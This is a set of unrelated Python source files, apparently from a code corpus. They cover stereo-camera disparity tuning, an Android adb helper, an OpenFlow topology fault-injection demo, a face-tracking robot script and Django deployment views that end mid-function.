ax[0][1].set_title("R frame")
# Remap images using the mapping found after calibration
dstL = cv2.remap(
stereo_img_drawn_corners[0], mapxL, mapyL, cv2.INTER_NEAREST
)
dstR = cv2.remap(
stereo_img_drawn_corners[1], mapxR, mapyR, cv2.INTER_NEAREST
)
# Plot the undistorted images
ax[1][0].imshow(dstL)
ax[1][0].set_title("L frame undistorted")
ax[1][1].imshow(dstR)
ax[1][1].set_title("R frame undistorted")
plt.show()
def undistort_rectify(
self, frameL: np.ndarray, frameR: np.ndarray
) -> (np.ndarray, np.ndarray):
# Check calibration data
if not self._is_calibrated:
raise MissingParametersError("Calibration")
# Undistort and rectify using calibration data
dstL = cv2.remap(
frameL,
self._calib_params["mapxL"],
self._calib_params["mapyL"],
cv2.INTER_LINEAR,
)
dstR = cv2.remap(
frameR,
self._calib_params["mapxR"],
self._calib_params["mapyR"],
cv2.INTER_LINEAR,
)
return dstL, dstR
def disp_map_tuning(self, disp_file: str):
"""Allows to tune the disparity map
:param disp_file: path to the file where disparity parameters will be saved"""
print("Disparity map tuning...")
# Check calibration data
if not self._is_calibrated:
raise MissingParametersError("Calibration")
# Wait for ready signal from sensors
sigL, sigR = self.multicast_recv_sig()
print(f"Left sensor: {sigL}")
print(f"Right sensor: {sigR}")
print("Both sensors are ready")
# Initialize variables for countdown
n_sec, tot_sec = 0, 4
str_sec = "4321"
# Synchronize sensors with a start signal
self.multicast_send_sig(b"START")
self._create_io_threads()
# Save start time
start_time = time.time()
dstL, dstR = None, None
while True:
# Get frames from both cameras and apply sensor corrections
try:
frameL, frameR = self._read_stereo_frames()
except OutOfSyncError as e:
print(
f"\nThe two sensors are out of sync of {e.delay:3f} s and must be restarted."
)
self._reset_sensors()
continue
dstL, dstR = self.undistort_rectify(frameL, frameR)
# Flip frames horizontally to make it more comfortable for humans
flipped_dstL = cv2.flip(dstL, 1)
flipped_dstR = cv2.flip(dstR, 1)
if n_sec < tot_sec:
# Draw on screen the current remaining seconds
cv2.putText(
img=flipped_dstR,
text=str_sec[n_sec],
org=(int(10), int(40)),
fontFace=cv2.FONT_HERSHEY_DUPLEX,
fontScale=1,
color=(255, 255, 255),
thickness=3,
lineType=cv2.LINE_AA,
)
# If time elapsed is greater than one second, update 'n_sec'
time_elapsed = time.time() - start_time
if time_elapsed >= 1:
n_sec += 1
start_time = time.time()
else:
self.multicast_send_sig(b"STOP")
self._kill_io_threads()
break
# Display side by side the frames
frames = np.hstack((flipped_dstR, flipped_dstL))
cv2.imshow("Left and right frames", frames)
cv2.waitKey(1)
cv2.destroyAllWindows()
print("Sample image captured.")
# Create named window and sliders for tuning
window_label = "Disparity tuning"
MDS_label = "Minimum Disparity"
MDS_label_neg = "Minimum Disparity (negative)"
NOD_label = "Number of Disparities"
SWS_label = "SAD window size"
PFC_label = "PreFilter Cap"
D12MD_label = "Disp12MaxDiff"
UR_label = "Uniqueness Ratio"
SPWS_label = "Speckle Window Size"
SR_label = "Speckle Range"
M_label = "Mode"
cv2.namedWindow(window_label)
cv2.createTrackbar(MDS_label, window_label, 0, 40, lambda *args: None)
cv2.createTrackbar(MDS_label_neg, window_label, 0, 40, lambda *args: None)
cv2.createTrackbar(NOD_label, window_label, 0, 256, lambda *args: None)
cv2.createTrackbar(SWS_label, window_label, 1, 15, lambda *args: None)
cv2.createTrackbar(PFC_label, window_label, 0, 100, lambda *args: None)
cv2.createTrackbar(D12MD_label, window_label, 0, 300, lambda *args: None)
cv2.createTrackbar(UR_label, window_label, 0, 20, lambda *args: None)
cv2.createTrackbar(SPWS_label, window_label, 0, 300, lambda *args: None)
cv2.createTrackbar(SR_label, window_label, 0, 5, lambda *args: None)
cv2.createTrackbar(M_label, window_label, 0, 1, lambda *args: None)
while True:
# Retrieve values set by trackers
MDS = cv2.getTrackbarPos(MDS_label, window_label)
MDS_neg = cv2.getTrackbarPos(MDS_label_neg, window_label)
if MDS == 0:
MDS = -MDS_neg
# Convert NOD to next multiple of 16
NOD = cv2.getTrackbarPos(NOD_label, window_label)
NOD = NOD - (NOD % 16) + 16
# Convert SWS to next odd number
SWS = cv2.getTrackbarPos(SWS_label, window_label)
SWS = SWS - (SWS % 2) + 2
P1 = 8 * 3 * SWS ** 2
P2 = 32 * 3 * SWS ** 2
D12MD = cv2.getTrackbarPos(D12MD_label, window_label)
UR = cv2.getTrackbarPos(UR_label, window_label)
SPWS = cv2.getTrackbarPos(SPWS_label, window_label)
SR = cv2.getTrackbarPos(SR_label, window_label)
PFC = cv2.getTrackbarPos(PFC_label, window_label)
M = cv2.getTrackbarPos(M_label, window_label)
# Create and configure left and right stereo matchers
stereo_matcher = cv2.StereoSGBM_create(
minDisparity=MDS,
numDisparities=NOD,
blockSize=SWS,
P1=P1,
P2=P2,
disp12MaxDiff=D12MD,
uniquenessRatio=UR,
speckleWindowSize=SPWS,
speckleRange=SR,
preFilterCap=PFC,
mode=M,
)
# Compute disparity map
disp = compute_disparity(dstL, dstR, stereo_matcher)
# Apply colormap to disparity
disp_color = cv2.applyColorMap(disp, cv2.COLORMAP_PLASMA)
# Stack resized frames and disparity map and display them
disp_tune = np.hstack((dstL, disp_color))
cv2.imshow(window_label, disp_tune)
# If 'q' is pressed, exit and return parameters
if cv2.waitKey(1) & 0xFF == ord("q"):
disp_params = {
"MDS": MDS,
"NOD": NOD,
"SWS": SWS,
"D12MD": D12MD,
"UR": UR,
"SPWS": SPWS,
"SR": SR,
"PFC": PFC,
"M": M,
}
break
cv2.destroyAllWindows()
self._set_disp_params(disp_params)
self._save_disp_params(disp_file)
print("Disparity parameters saved to file")
def realtime_disp_map(self):
"""Displays a real-time disparity map"""
print("Displaying real-time disparity map...")
# Reset disparity bounds
self._disp_bounds = [np.inf, -np.inf]
# Load calibration and disparity data
if not self._is_calibrated:
raise MissingParametersError("Calibration")
if not self._has_disparity_params:
raise MissingParametersError("Disparity")
P1 = 8 * 3 * self._disp_params["SWS"] ** 2
P2 = 32 * 3 * self._disp_params["SWS"] ** 2
# Create and configure left and right stereo matchers
stereo_matcher = cv2.StereoSGBM_create(
minDisparity=self._disp_params["MDS"],
numDisparities=self._disp_params["NOD"],
blockSize=self._disp_params["SWS"],
P1=P1,
P2=P2,
disp12MaxDiff=self._disp_params["D12MD"],
uniquenessRatio=self._disp_params["UR"],
speckleWindowSize=self._disp_params["SPWS"],
speckleRange=self._disp_params["SR"],
preFilterCap=self._disp_params["PFC"],
mode=self._disp_params["M"],
)
# Compute valid ROI
# valid_ROI = cv2.getValidDisparityROI(roi1=tuple(self._calib_params['valid_ROIL']),
# roi2=tuple(self._calib_params['valid_ROIR']),
# minDisparity=self._disp_params['MDS'],
# numberOfDisparities=self._disp_params['NOD'],
# blockSize=self._disp_params['SWS'])
# Define skin color bounds in YCbCr color space
skin_lower = np.array([0, 133, 77], dtype=np.uint8)
skin_upper = np.array([255, 173, 127], dtype=np.uint8)
# Wait for ready signal from sensors
sigL, sigR = self.multicast_recv_sig()
print(f"Left sensor: {sigL}")
print(f"Right sensor: {sigR}")
print("Both sensors are ready")
# Synchronize sensors with a start signal
self.multicast_send_sig(b"START")
self._create_io_threads()
while True:
# Get frames from both cameras and apply sensor corrections
try:
frameL, frameR = self._read_stereo_frames()
except OutOfSyncError as e:
print(
f"\nThe two sensors are out of sync of {e.delay:3f} s and must be restarted."
)
self._reset_sensors()
continue
dstL, dstR = self.undistort_rectify(frameL, frameR)
# Crop frames to valid ROI
# x, y, w, h = valid_ROI
# dstL = dstL[y:y + h, x:x + w]
# dstR = dstR[y:y + h, x:x + w]
# Compute disparity map
disp = compute_disparity(dstL, dstR, stereo_matcher, self._disp_bounds)
# Apply colormap to disparity
disp_color = cv2.applyColorMap(disp, cv2.COLORMAP_PLASMA)
# Segment hand
# Step 1: threshold disparity map
_, disp_mask = cv2.threshold(disp, 191, 255, cv2.THRESH_BINARY)
# Step 2: convert frame to YCbCr color space and segment pixels in the given range
converted = cv2.cvtColor(dstL, cv2.COLOR_BGR2YCrCb)
skin_mask = cv2.inRange(converted, skin_lower, skin_upper)
# Step 3: apply both masks to the frame
mask = np.bitwise_and(skin_mask, disp_mask)
hand = cv2.bitwise_and(
dstL.astype(np.uint8), dstL.astype(np.uint8), mask=mask
)
hand_disp = cv2.bitwise_and(disp, disp, mask=mask)
# Step 4: apply close operator to refine the segmented image
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5))
hand = cv2.morphologyEx(hand, cv2.MORPH_CLOSE, kernel)
hand_disp = cv2.morphologyEx(hand_disp, cv2.MORPH_CLOSE, kernel)
# Get depth information from disparity map
hand_depth = cv2.reprojectImageTo3D(
hand_disp,
Q=self._disp_params["disp_to_depth_mtx"],
handleMissingValues=True,
)
# TODO: insert ML algorithm here
# Display frames and disparity maps
frames = np.hstack((dstL, dstR))
cv2.imshow("Left and right frame", frames)
cv2.imshow(
"Disparity",
np.hstack(
(np.repeat(np.expand_dims(disp, axis=-1), 3, axis=-1), disp_color)
),
)
cv2.imshow(
"Hand",
np.hstack(
(hand, np.repeat(np.expand_dims(hand_disp, axis=-1), 3, axis=-1))
),
)
# When 'q' is pressed, save current frames and disparity maps to file and break the loop
if cv2.waitKey(1) & 0xFF == ord("q"):
print(type(hand_depth))
print(hand_depth.shape)
self.multicast_send_sig(b"STOP")
self._kill_io_threads()
break
cv2.destroyAllWindows()
print("Streaming ended.")
|
adbutil.py
|
import subprocess
import re
import threading
ATRACE_PATH="/android/catapult/systrace/systrace/systrace.py"
class AdbError(RuntimeError):
def __init__(self, arg):
self.args = arg
def am(serial, cmd, args):
if not isinstance(args, list):
args = [args]
full_args = ["am"] + [cmd] + args
__call_adb(serial, full_args, False)
def pm(serial, cmd, args):
if not isinstance(args, list):
args = [args]
full_args = ["pm"] + [cmd] + args
__call_adb(serial, full_args, False)
def dumpsys(serial, topic):
return __call_adb(serial, ["dumpsys"] + [topic], True)
def trace(serial,
tags = ["gfx", "sched", "view", "freq", "am", "wm", "power", "load", "memreclaim"],
time = "10"):
args = [ATRACE_PATH, "-e", serial, "-t" + time, "-b32768"] + tags
subprocess.call(args)
def wake(serial):
output = dumpsys(serial, "power")
wakefulness = re.search('mWakefulness=([a-zA-Z]+)', output)
if wakefulness.group(1) != "Awake":
__call_adb(serial, ["input", "keyevent", "KEYCODE_POWER"], False)
def root(serial):
subprocess.call(["adb", "-s", serial, "root"])
def pull(serial, path, dest):
subprocess.call(["adb", "-s", serial, "wait-for-device", "pull"] + [path] + [dest])
def shell(serial, cmd):
__call_adb(serial, cmd, False)
def track_logcat(serial, awaited_string, callback):
threading.Thread(target=__track_logcat, name=serial + "-waiter", args=(serial, awaited_string, callback)).start()
def __call_adb(serial, args, block):
full_args = ["adb", "-s", serial, "wait-for-device", "shell"] + args
print full_args
output = None
try:
if block:
output = subprocess.check_output(full_args)
else:
subprocess.call(full_args)
except subprocess.CalledProcessError:
raise AdbError("Error calling " + " ".join(args))
return output
|
gui-web.py
|
#!/usr/bin/env python
import sys, argparse, threading, time, math, random, json, os
import SimpleHTTPServer, SocketServer, Queue
import pylibopenflow.openflow as openflow
import pylibopenflow.output as output
import pylibopenflow.of.msg as of_msg
import pylibopenflow.of.simu as of_simu
from pinpoint import Pinpointer
class StanfordTopo:
"Topology for Stanford backbone"
PORT_ID_MULTIPLIER = 1
INTERMEDIATE_PORT_TYPE_CONST = 1
OUTPUT_PORT_TYPE_CONST = 2
PORT_TYPE_MULTIPLIER = 10000
SWITCH_ID_MULTIPLIER = 100000
DUMMY_SWITCH_BASE = 1000
PORT_MAP_FILENAME = "data/stanford/port_map.txt"
TOPO_FILENAME = "data/stanford/backbone_topology.tf"
dummy_switches = set()
def __init__( self ):
# Read topology info
self.switch_id_to_name = {}
self.ports = self.load_ports(self.PORT_MAP_FILENAME)
self.links = self.load_topology(self.TOPO_FILENAME)
self.switches = self.ports.keys()
self.switch_name_to_errors = {}
self.link_id_to_errors = {}
def load_ports(self, filename):
ports = {}
f = open(filename, 'r')
for line in f:
if line.startswith("$"):
switch_name = line[1:].strip()
stored = False
elif not line.startswith("$") and line != "":
tokens = line.strip().split(":")
port_flat = int(tokens[1])
dpid = port_flat / self.SWITCH_ID_MULTIPLIER
port = port_flat % self.PORT_TYPE_MULTIPLIER
if dpid not in ports.keys():
ports[dpid] = set()
if port not in ports[dpid]:
ports[dpid].add(port)
if not stored:
self.switch_id_to_name[dpid] = switch_name
stored = True
f.close()
return ports
def load_topology(self, filename):
links = set()
f = open(filename, 'r')
for line in f:
if line.startswith("link"):
tokens = line.split('$')
src_port_flat = int(tokens[1].strip('[]').split(', ')[0])
dst_port_flat = int(tokens[7].strip('[]').split(', ')[0])
link_id = tokens[-2]
links.add((src_port_flat, dst_port_flat, link_id))
f.close()
return links
def dump_json(self, filename):
topo = StanfordTopo()
nodes = []
links = []
for (src_port, dst_port, link_id) in topo.links:
if link_id not in self.link_id_to_errors.keys():
self.link_id_to_errors[link_id] = False
if self.link_id_to_errors[link_id]:
links.append({"source": src_port / topo.SWITCH_ID_MULTIPLIER - 1,
"target":dst_port / topo.SWITCH_ID_MULTIPLIER - 1,
"value": 1,
"problems": 1,
"name" : link_id
})
else:
links.append({"source": src_port / topo.SWITCH_ID_MULTIPLIER - 1,
"target":dst_port / topo.SWITCH_ID_MULTIPLIER - 1,
"value": 1,
"name" : link_id
})
for index in xrange(0, len(topo.switch_id_to_name.keys())):
switch_name = topo.switch_id_to_name[index+1]
if switch_name not in self.switch_name_to_errors.keys():
self.switch_name_to_errors[switch_name] = []
if switch_name.startswith("bbr"):
group = 0
else:
group = 1
if not self.switch_name_to_errors[switch_name] == []:
problems = self.switch_name_to_errors[switch_name]
json_string = "$".join(problems)
json_string.replace('\r','')
json_string.replace('\n','')
nodes.append({"name":switch_name,"group":group, "problems":json_string} )
else:
nodes.append({"name":switch_name,"group":group} )
json_object = {"nodes":nodes,"links":links}
f = open(filename,'w')
json.dump(json_object, f)
f.close
def inject_errors(self, error_rules):
# error_rules is a set of error rule ids
p = Pinpointer()
for rule in error_rules:
tokens = rule.split("_")
if rule not in self.switch_name_to_errors["_".join(tokens[0:2])]:
self.switch_name_to_errors["_".join(tokens[0:2])].extend(p.get_config_lines(rule))
def remove_errors(self, error_rules):
p = Pinpointer()
for rule in error_rules:
tokens = rule.split("_")
lines = p.get_config_lines(rule)
for line in lines:
try:
self.switch_name_to_errors["_".join(tokens[0:2])].remove(line)
except:
pass
def inject_link_errors(self, error_rules):
for rule in error_rules:
self.link_id_to_errors[rule] = True
def remove_link_errors(self, error_rules):
for rule in error_rules:
try:
self.link_id_to_errors[rule] = False
except:
pass
def clear_errors(self):
for switch in self.switch_name_to_errors.keys():
self.switch_name_to_errors[switch] = []
for link_id in self.link_id_to_errors.keys():
self.link_id_to_errors[link_id] = False
class DemoHTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path.startswith("/web/data"):
last_time = os.path.getmtime('.' + self.path)
elapse = time.time() - last_time
if elapse > 5:
self.send_response(304)
return
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
if self.path.startswith("/web/inject"):
self.do_inject_external()
elif self.path.startswith("/web/reset"):
self.do_reset_external()
elif self.path.startswith("/web/detect"):
self.do_detect_external()
self.send_response(200)
def do_inject_external(self):
pass
def do_reset_external(self):
pass
def do_detect_external(self):
pass
class TCPServer(SocketServer.TCPServer):
allow_reuse_address = True
class Application:
CONTROLLER_DPID = 0xCAFECAFE
def main(self):
# Start the periodic call in the GUI to check if the queue contains
# anything
try:
while True:
self.processOF()
self.processError()
time.sleep(1)
except KeyboardInterrupt:
# Stop Thread 1
self.running = False
# Stop Thread 3
self.httpd.shutdown()
return -1
def __init__(self, controller='localhost', port=6633):
self.controller = controller
self.port = port
self.received_packet_count = 0
self.topology_real = StanfordTopo()
self.topology_discovered = StanfordTopo()
self.pinpointer = Pinpointer()
# Content: String!
self.queue_GUI_to_OF = Queue.Queue()
# Contnet: OF message!
self.queue_OF_to_GUI = Queue.Queue()
self.running = True
# Thread 1: OF thread
self.thread1 = threading.Thread(target=self.connectToController)
#self.thread1.start()
# Thread 2: Connect to run pinpointer
self.errors = []
self.test_packets = []
self.queue_pinpoint_to_GUI = Queue.Queue()
self.thread2 = None
# Thread 3: WebServer
DemoHTTPHandler.do_inject_external = self.do_inject
DemoHTTPHandler.do_reset_external = self.do_reset
DemoHTTPHandler.do_detect_external = self.do_detect
self.httpd = TCPServer(("", 8000), DemoHTTPHandler)
self.thread3 = threading.Thread(target=self.httpd.serve_forever)
self.thread3.start()
self.draw_callback(None)
def do_inject(self):
self.inject_callback(None)
def do_reset(self):
self.topology_real.clear_errors()
self.topology_discovered.clear_errors()
self.topology_real.dump_json("web/data/data.json")
self.topology_discovered.dump_json("web/data/dataDiscovered.json")
def do_detect(self):
if self.errors != []:
self.thread2 = threading.Thread(target=self.pinpoint, args=(self.test_packets, self.errors))
self.thread2.start()
self.errors = []
else:
# Touch!
self.topology_discovered.dump_json("web/data/dataDiscovered.json")
def submit_callback(self, widget, entry):
packet = entry.get_text()
self.send_packet(packet)
def draw_callback(self, widget):
self.topology_real.dump_json("web/data/data.json")
self.topology_discovered.dump_json("web/data/dataDiscovered.json")
def inject_callback(self, widget):
self.topology_real.clear_errors()
self.topology_discovered.clear_errors()
test_packets, errors = self.pinpointer.generate_test_case(1)
self.errors = errors
self.test_packets = test_packets
link_errors = []
device_errors = []
for error in errors:
if error.startswith("_"):
link_errors.append(error)
else:
device_errors.append(error)
self.topology_real.inject_errors(device_errors)
self.topology_real.inject_link_errors(link_errors)
self.topology_real.dump_json("web/data/data.json")
#self.thread2 = threading.Thread(target=self.pinpoint, args=(test_packets, errors))
#self.thread2.start()
def send_packet(self, packet="Hello, World!\n"):
self.queue_GUI_to_OF.put(packet)
def processOF(self):
while not self.queue_OF_to_GUI.empty():
msg = self.queue_OF_to_GUI.get()
self.msgCallback(msg)
if not self.running:
sys.exit(1)
return True
def processError(self):
if self.queue_pinpoint_to_GUI.empty():
return True
link_errors = []
device_errors = []
errors = self.queue_pinpoint_to_GUI.get()
for error in errors:
if error.startswith("_"):
link_errors.append(error)
else:
device_errors.append(error)
self.topology_discovered.inject_errors(device_errors)
self.topology_discovered.inject_link_errors(link_errors)
self.topology_discovered.dump_json("web/data/dataDiscovered.json")
return True
def connectToController(self):
#Connect to controller
ofmsg = openflow.messages()
ofparser = of_msg.parser(ofmsg)
ofsw = of_simu.switch(ofmsg, self.controller, self.port,
dpid=self.CONTROLLER_DPID,
parser=ofparser)
ofsw.send_hello()
while self.running:
msg = ofsw.connection.msgreceive(blocking=False)
# OF to GUI
if msg != None:
ofsw.receive_openflow(msg)
self.queue_OF_to_GUI.put(msg)
# GUI to OF
while not self.queue_GUI_to_OF.empty():
packet = self.queue_GUI_to_OF.get()
ofsw.send_packet(inport=0, packet=packet)
time.sleep(0.1)
def pinpoint(self, test_packets, errors):
errors = self.pinpointer.pin_point_test ( test_packets, errors )
print "Fuck!!"
self.queue_pinpoint_to_GUI.put(errors)
def main():
parser = argparse.ArgumentParser(description='Python backend to communicate with Beacon', epilog="Report any bugs to hyzeng@stanford.edu")
parser.add_argument('--controller', '-c', dest='controller', default="localhost")
parser.add_argument('--port', '-p', dest='port', default=6633)
parser.add_argument('--verbose', '-v', dest='verbose', action='count')
args = parser.parse_args()
port = args.port
controller = args.controller
if args.verbose == None:
output.set_mode("INFO")
else:
output.set_mode("DBG")
# Main Loop here
app = Application(controller=controller, port=port)
app.main()
if __name__ == '__main__':
main()
|
Main.py
|
from help_modules import *
from motor_control import *
import pyaudio
import wave
import numpy as np
import time
import matplotlib.pyplot as plt
import speech_recognition as sr
from scipy import signal
import math
import threading
import multiprocessing as ms
import os
import cv2
from nanpy import (ArduinoApi, SerialManager)
import dlib
import pygame
###configure tts####
def speak(audio_file_name):
pygame.mixer.init(16500)
pygame.mixer.music.load(audio_file_name)
pygame.mixer.music.play()
#while pygame.mixer.music.get_busy() == True:
#continue
P_GAIN, I_GAIN, D_GAIN = 0.025,0.00000001,0.001
###Configuring face detector###
detector = dlib.get_frontal_face_detector()
###Configuring Video ###
vs = cv2.VideoCapture(0)
w,h=260,195
### Configuring Audio###
r = sr.Recognizer()
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
CHUNK = 2048
SPEAKING_THRESH = 0.8
WAVE_OUTPUT_FILENAME = "file.wav"
DEVICE_INDEX = get_audio_device()
frame=np.zeros((480,360))
frames = [0] * 5000
frames_l = [0] * 5000
frames_r = [0] * 5000
times = [0] * 5000
data=0
audio = pyaudio.PyAudio()
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True,
input_device_index=DEVICE_INDEX,
frames_per_buffer=CHUNK)
def record_audio():
global CHUNK
global data
global times
while True:
data = stream.read(CHUNK)
frames.append(data)
frames.pop(0)
times.append(time.time())
times.pop(0)
audio_capture = threading.Thread(target=record_audio)
audio_capture.start()
time.sleep(2)
###data,frame are always available for any calculation###
det=""
make_contact=0
def speech_rec():
global det
global data
global SPEAKING_THRESH
global make_contact
t1 = time.time()
start_time = t1
stopped_time = t1
while True:
if is_speaking(data, SPEAKING_THRESH):
if (time.time() - t1) > 1:
start_time = time.time() - 1
t1 = time.time()
else:
t2 = time.time()
if (t2 - t1) > 1 and t1 > stopped_time:
stopped_time = t2 + 0.5
start_index = (np.abs(np.array(times) - start_time)).argmin()
stop_index = (np.abs(np.array(times) - stopped_time)).argmin()
mic_l, mic_r = get_corresponding_mic_data(frames, start_index, stop_index)
save_audio(frames[start_index:stop_index],audio,WAVE_OUTPUT_FILENAME,CHANNELS,FORMAT,RATE)
det = recognize(sr,r,WAVE_OUTPUT_FILENAME)
print(det)
if "hello Amigo" in det:
lag, lags, corr = lag_finder(mic_l, mic_r, 44100)
lag = lag * 1000000 / RATE#microseconds
angle = find_angle(lag/1000000, 9, 36750)
print("angle: ",angle)
move_neck(angle)
make_contact=1
speak("Audio/hello.wav")
if "bye" in det:
speak("Audio/bye.wav")
make_contact=0
reset_motors()
speech_reco = threading.Thread(target=speech_rec)
speech_reco.start()
def get_video_info():
_,frame = vs.read()
frame = cv2.resize(frame, (w,h))
x1, y1, x2, y2 = detect_face(detector, frame)
try:
frame = cv2.rectangle(frame, (x1,y1), (x2,y2), (255,0,0), 1)
except:
frame=frame
return frame,x1,y1,x2,y2
while True:
not_detected = 0
frame,x1,y1,x2,y2= get_video_info()
if "hello Amigo" in det:
t0=time.time()
Ix_old,errorx_old,Iy_old,errory_old = 0,0,0,0
while not_detected<100:
frame,x1,y1,x2,y2= get_video_info()
#cv2.imshow("vision",frame)
key = cv2.waitKey(1)& 0xFF
if key == ord("q"):
vs.release()
cv2.destroyAllWindows()
sys.exit()
break
if not(x1==None) and make_contact==1:
fx=x1+(x2-x1)/2
fy=y1+(y2-y1)/2
t1=time.time()
dt=t1-t0
pidx, pidy,errorx_old,Ix_old,errory_old,Iy_old = pid_cal(w/2,h/2,fx,fy,dt,Ix_old,errorx_old,Iy_old,errory_old, P_GAIN, I_GAIN, D_GAIN)
change_servox(pidx)
change_servoy(-pidy)
t0=t1
not_detected=0
if "bye" in det:
speak("Audio/bye.wav")
det=""
make_contact = 0
reset_motors()
if "company close" in det or "closing time" in det:
speak("Audio/close_time.wav")
det=""
else:
not_detected=not_detected+1
print("Face not detected..")
make_contact=0
reset_motors()
det =""
#cv2.imshow("vision",frame)
key = cv2.waitKey(1)& 0xFF
if key == ord("q"):
vs.release()
cv2.destroyAllWindows()
sys.exit()
break
|
views.py
|
# Copyright: (c) OpenSpug Organization. https://github.com/openspug/spug
# Copyright: (c) <spug.dev@gmail.com>
# Released under the AGPL-3.0 License.
from django.views.generic import View
from django.db.models import F
from django.conf import settings
from django.http.response import HttpResponseBadRequest
from django_redis import get_redis_connection
from libs import json_response, JsonParser, Argument, human_datetime, human_time
from apps.deploy.models import DeployRequest
from apps.app.models import Deploy, DeployExtend2
from apps.deploy.utils import deploy_dispatch, Helper
from apps.host.models import Host
from collections import defaultdict
from threading import Thread
from datetime import datetime
import subprocess
import json
import uuid
import os
class RequestView(View):
def get(self, request):
data, query = [], {}
if not request.user.is_supper:
perms = request.user.deploy_perms
query['deploy__app_id__in'] = perms['apps']
query['deploy__env_id__in'] = perms['envs']
for item in DeployRequest.objects.filter(**query).annotate(
env_id=F('deploy__env_id'),
env_name=F('deploy__env__name'),
app_id=F('deploy__app_id'),
app_name=F('deploy__app__name'),
app_host_ids=F('deploy__host_ids'),
app_extend=F('deploy__extend'),
created_by_user=F('created_by__nickname')):
tmp = item.to_dict()
tmp['env_id'] = item.env_id
tmp['env_name'] = item.env_name
tmp['app_id'] = item.app_id
tmp['app_name'] = item.app_name
tmp['app_extend'] = item.app_extend
tmp['extra'] = json.loads(item.extra)
tmp['host_ids'] = json.loads(item.host_ids)
tmp['app_host_ids'] = json.loads(item.app_host_ids)
tmp['status_alias'] = item.get_status_display()
tmp['created_by_user'] = item.created_by_user
data.append(tmp)
return json_response(data)
def post(self, request):
form, error = JsonParser(
Argument('id', type=int, required=False),
Argument('deploy_id', type=int, help='缺少必要参数'),
Argument('name', help='请输申请标题'),
Argument('extra', type=list, help='缺少必要参数'),
Argument('host_ids', type=list, filter=lambda x: len(x), help='请选择要部署的主机'),
Argument('desc', required=False),
).parse(request.body)
if error is None:
deploy = Deploy.objects.filter(pk=form.deploy_id).first()
if not deploy:
return json_response(error='未找到该发布配置')
if form.extra[0] == 'tag' and not form.extra[1]:
return json_response(error='请选择要发布的Tag')
if form.extra[0] == 'branch' and not form.extra[2]:
return json_response(error='请选择要发布的分支及Commit ID')
if deploy.extend == '2':
if form.extra[0]:
form.extra[0] = form.extra[0].replace("'", '')
if DeployExtend2.objects.filter(deploy=deploy, host_actions__contains='"src_mode": "1"').exists():
if len(form.extra) < 2:
return json_response(error='该应用的发布配置中使用了数据传输动作且设置为发布时上传,请上传要传输的数据')
form.version = form.extra[1].get('path')
form.name = form.name.replace("'", '')
form.status = '0' if deploy.is_audit else '1'
form.extra = json.dumps(form.extra)
form.host_ids = json.dumps(form.host_ids)
if form.id:
req = DeployRequest.objects.get(pk=form.id)
is_required_notify = deploy.is_audit and req.status == '-1'
DeployRequest.objects.filter(pk=form.id).update(
created_by=request.user,
reason=None,
**form
)
else:
req = DeployRequest.objects.create(created_by=request.user, **form)
is_required_notify = deploy.is_audit
if is_required_notify:
Thread(target=Helper.send_deploy_notify, args=(req, 'approve_req')).start()
return json_response(error=error)
def put(self, request):
form, error = JsonParser(
Argument('id', type=int, help='缺少必要参数'),
Argument('action', filter=lambda x: x in ('check', 'do'), help='参数错误')
).parse(request.body)
if error is None:
req = DeployRequest.objects.filter(pk=form.id).first()
if not req:
return json_response(error='未找到指定发布申请')
pre_req = DeployRequest.objects.filter(
deploy_id=req.deploy_id,
type='1',
id__lt=req.id,
version__isnull=False).first()
if not pre_req:
return json_response(error='未找到该应用可以用于回滚的版本')
if form.action == 'check':
return json_response({'date': pre_req.created_at, 'name': pre_req.name})
DeployRequest.objects.create(
deploy_id=req.deploy_id,
name=f'{req.name} - 回滚',
type='2',
extra=pre_req.extra,
host_ids=req.host_ids,
status='0' if pre_req.deploy.is_audit else '1',
desc='自动回滚至该应用的上个版本',
version=pre_req.version,
created_by=request.user
)
return json_response(error=error)
def delete(self, request):
form, error = JsonParser(
Argument('id', type=int, required=False),
Argument('expire', required=False),
Argument('count', type=int, required=False, help='请输入数字')
).parse(request.GET)
if error is None:
rds = get_redis_connection()
if form.id:
DeployRequest.objects.filter(pk=form.id, status__in=('0', '1', '-1')).delete()
return json_response()
elif form.count:
if form.count < 1:
return json_response(error='请输入正确的保留数量')
counter, ids = defaultdict(int), []
for item in DeployRequest.objects.all():
if counter[item.deploy_id] == form.count:
ids.append(item.id)
else:
counter[item.deploy_id] += 1
count, _ = DeployRequest.objects.filter(id__in=ids).delete()
if ids:
rds.delete(*(f'{settings.REQUEST_KEY}:{x}' for x in ids))
return json_response(count)
elif form.expire:
requests = DeployRequest.objects.filter(created_at__lt=form.expire)
ids = [x.id for x in requests]
count, _ = requests.delete()
if ids:
rds.delete(*(f'{settings.REQUEST_KEY}:{x}' for x in ids))
return json_response(count)
else:
return json_response(error='请至少使用一个删除条件')
return json_response(error=error)
class RequestDetailView(View):
def get(self, request, r_id):
req = DeployRequest.objects.filter(pk=r_id).first()
if not req:
return json_response(error='未找到指定发布申请')
hosts = Host.objects.filter(id__in=json.loads(req.host_ids))
targets = [{'id': x.id, 'title': f'{x.name}({x.hostname}:{x.port})'} for x in hosts]
server_actions, host_actions, outputs = [], [], []
if req.deploy.extend == '2':
server_actions = json.loads(req.deploy.extend_obj.server_actions)
host_actions = json.loads(req.deploy.extend_obj.host_actions)
if request.GET.get('log'):
rds, key, counter = get_redis_connection(), f'{settings.REQUEST_KEY}:{r_id}', 0
data = rds.lrange(key, counter, counter + 9)
while data:
counter += 10
outputs.extend(x.decode() for x in data)
data = rds.lrange(key, counter, counter + 9)
return json_response({
'app_name': req.deploy.app.name,
'env_name': req.deploy.env.name,
'status': req.status,
'type': req.type,
'status_alias': req.get_status_display(),
'targets': targets,
'server_actions': server_actions,
'host_actions': host_actions,
'outputs': outputs
})
def post(self, request, r_id):
query = {'pk': r_id}
if not request.user.is_supper:
perms = request.user.deploy_perms
query['deploy__app_id__in'] = perms['apps']
query['deploy__env_id__in'] = perms['envs']
req = DeployRequest.objects.filter(**query).first()
if not req:
return json_response(error='未找到指定发布申请')
if req.status not in ('1', '-3'):
return json_response(error='该申请单当前状态还不能执行发布')
hosts = Host.objects.filter(id__in=json.loads(req.host_ids))
token = uuid.uuid4().hex
outputs = {str(x.id): {'data': []} for x in hosts}
